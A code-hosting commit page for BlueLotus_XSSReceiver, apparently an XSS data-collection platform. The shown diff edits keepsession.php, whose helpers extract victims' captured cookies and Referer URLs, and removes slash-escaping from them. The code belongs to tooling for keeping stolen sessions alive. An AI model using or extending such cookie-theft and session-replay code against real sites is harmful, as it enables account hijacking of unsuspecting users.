firesunCN/BlueLotus_XSSReceiver
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Version 3.3.7

Browse Source 
去除addslashes转义(无sql),确保UI显示的是非转义的结果
This commit is contained in:
firesun
2016-02-03 21:49:16 +08:00
parent 3cb52ed6e2
commit 1669079625
4 changed files with 48 additions and 14 deletions
Download Patch File Download Diff File Expand all files Collapse all files

6
keepsession.php
View File

@@ -49,7 +49,7 @@ if (KEEP_SESSION) {
}
//可加上sleep来防止keepsession被ddos
//可加上sleep来防止keepsession被ddos
//sleep(10);
flock($pid, LOCK_UN);
}
@@ -75,7 +75,7 @@ function getCookie($info)
else if (isset($info['cookie_data']['cookie']) && $info['cookie_data']['cookie'] != "")
$cookie = $info['cookie_data']['cookie'];
return htmlspecialchars_decode(stripslashes($cookie), ENT_QUOTES);
return htmlspecialchars_decode($cookie, ENT_QUOTES);
}
@@ -98,5 +98,5 @@ function getLocation($info)
else if (isset($info['headers_data']['Referer']) && $info['headers_data']['Referer'] != "")
$location = $info['headers_data']['Referer'];
return htmlspecialchars_decode(stripslashes($location), ENT_QUOTES);
return htmlspecialchars_decode($location, ENT_QUOTES);
}